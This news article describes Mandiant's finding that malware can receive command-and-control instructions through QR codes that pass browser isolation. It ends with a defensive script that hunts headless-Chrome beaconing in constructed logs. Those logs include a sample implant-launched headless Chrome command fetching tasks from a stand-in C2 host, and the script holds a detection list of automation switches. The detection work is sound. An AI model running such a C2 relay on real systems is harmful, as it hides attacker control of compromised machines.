QR codes can be used to crack this essential browser security tool
- Browser isolation runs all scripts in a remote or virtual environment, but QR codes still come through
- If a device is already infected, the malware can receive C2 commands hidden in QR codes, bypassing browser isolation
- The method works, but has its limitations
Cybersecurity researchers at Mandiant claim to have discovered a new way for malware to communicate with its C2 servers through the browser, even when browser isolation is in place and no web content runs on the endpoint.
There is a relatively new method of protecting against attacks delivered over the web called ‘browser isolation’. Instead of loading pages locally, the user’s browser connects to a remote browser running in a cloud environment or a virtual machine. Keystrokes and clicks are forwarded to the remote browser, and all that comes back is a visual rendering of the page (a pixel stream). Code, scripts and commands all execute on the remote side, never on the user’s device.
Think of it like scrolling through the lens of a phone camera.
Limits and disadvantages
But now Mandiant believes that C2 (command and control) servers can still talk to malware on an infected device even though no code from the web page runs there, and the trick is QR codes. Browser isolation strips out scripts and active content, but it must still deliver the pixels of the rendered page. Malware already running on the endpoint can capture those pixels; if the page displays a QR code, the malware decodes it and extracts the command it carries.
Mandiant has prepared a proof-of-concept (PoC) showing the method working against the latest version of Google Chrome, relaying commands to the implant through Cobalt Strike’s External C2 feature.
The method works but is far from ideal, the researchers added. Because each QR code carries at most 2,189 bytes and every round trip adds roughly 5 seconds of latency, the channel cannot move large payloads or support SOCKS proxying. Furthermore, additional controls such as URL scanning or data loss prevention may block it outright.
Still, the method can be abused to carry out damaging malware attacks. IT teams are therefore advised to keep monitoring traffic flows, particularly from headless browsers running in automation mode, which is how the PoC drives the isolated session.
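As an added example of the monitoring advice above (not Mandiant’s PoC or detection content), the script below checks two things a defender can look for: a browser launched with headless or automation switches on an endpoint, and HTTP requests from a HeadlessChrome user agent that recur at a steady cadence, as a QR-code round trip of roughly 5 seconds would. The process events, proxy log lines, host names and destination `c2.example` are all constructed for this example, and the jitter and minimum-request thresholds are assumptions to tune for your environment.

```python
"""Hunt for the footprint of a headless-browser C2 relay in constructed logs.

Added example, not Mandiant's PoC.  Signals checked:
  1. a browser binary started with headless / automation switches, and
  2. HeadlessChrome requests to one destination at a steady interval.
All events and log lines below are constructed; thresholds are assumptions.
"""
import re
import shlex
import statistics
from collections import defaultdict
from datetime import datetime, timezone

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "chrome", "chromium", "chromium-browser"}

# Chromium switches that mark a non-interactive, automated session.
AUTOMATION_SWITCHES = {
    "--headless", "--remote-debugging-port", "--remote-debugging-pipe",
    "--screenshot", "--dump-dom",
}

# Constructed Sysmon-style process creation events.
PROCESS_EVENTS = [
    {"host": "WS01",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'},
    {"host": "WS02",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Users\bob\AppData\Roaming\update.exe",  # hypothetical implant
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new '
                r'--disable-gpu --window-size=1024,768 '
                r'--screenshot=C:\Users\bob\AppData\Local\Temp\s.png https://c2.example/task'},
]

# Constructed proxy log: ISO timestamp, host, destination, quoted user agent.
PROXY_LOG = """\
2024-12-02T10:00:00Z WS01 intranet.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0.0.0 Safari/537.36"
2024-12-02T10:00:00Z WS02 c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64) HeadlessChrome/131.0.0.0 Safari/537.36"
2024-12-02T10:00:05Z WS02 c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64) HeadlessChrome/131.0.0.0 Safari/537.36"
2024-12-02T10:00:10Z WS02 c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64) HeadlessChrome/131.0.0.0 Safari/537.36"
2024-12-02T10:00:16Z WS02 c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64) HeadlessChrome/131.0.0.0 Safari/537.36"
2024-12-02T10:00:21Z WS02 c2.example "Mozilla/5.0 (Windows NT 10.0; Win64; x64) HeadlessChrome/131.0.0.0 Safari/537.36"
2024-12-02T10:00:00Z WS03 ci.example "Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/131.0.0.0 Safari/537.36"
2024-12-02T10:00:01Z WS03 ci.example "Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/131.0.0.0 Safari/537.36"
2024-12-02T10:00:30Z WS03 ci.example "Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/131.0.0.0 Safari/537.36"
2024-12-02T10:01:10Z WS03 ci.example "Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/131.0.0.0 Safari/537.36"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')


def switches(cmdline):
    """Return the set of --switch names (values stripped) in a command line."""
    names = set()
    for tok in shlex.split(cmdline, posix=False):  # non-POSIX: keep Windows backslashes
        if tok.startswith("--"):
            names.add(tok.split("=", 1)[0])
    return names


def is_automated_browser(event):
    """True when a browser binary was started with an automation switch."""
    image = event["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    return image in BROWSER_IMAGES and bool(switches(event["cmdline"]) & AUTOMATION_SWITCHES)


def parse_proxy_log(text):
    """Parse the constructed proxy format into dicts with UTC timestamps."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, host, dst, ua = m.groups()
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        rows.append({"ts": when, "host": host, "dst": dst, "ua": ua})
    return rows


def find_headless_beacons(rows, min_requests=4, max_jitter=0.25):
    """Return (host, dst, median_gap_s) for HeadlessChrome traffic with a steady period.

    Jitter is the population standard deviation of the inter-request gaps divided
    by their median; a polling C2 loop keeps it small, ad-hoc automation does not.
    """
    by_pair = defaultdict(list)
    for r in rows:
        if "HeadlessChrome/" in r["ua"]:
            by_pair[(r["host"], r["dst"])].append(r["ts"])
    hits = []
    for (host, dst), stamps in sorted(by_pair.items()):
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        med = statistics.median(gaps)
        if med > 0 and statistics.pstdev(gaps) / med <= max_jitter:
            hits.append((host, dst, med))
    return hits


if __name__ == "__main__":
    for ev in PROCESS_EVENTS:
        if is_automated_browser(ev):
            print(f"[endpoint] {ev['host']}: automated browser launched by {ev['parent']}")
    for host, dst, gap in find_headless_beacons(parse_proxy_log(PROXY_LOG)):
        print(f"[proxy] {host} -> {dst}: HeadlessChrome beaconing every ~{gap:.0f}s")
```

The two signals are deliberately separate: a headless Chrome on a build server is normal, so the proxy check only fires when the cadence is regular, and the endpoint check only fires on automation switches, not on the window or GPU flags an installer might also pass. Feed real Sysmon event ID 1 records and proxy exports into the same functions to reuse the logic.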
Via BleepingComputer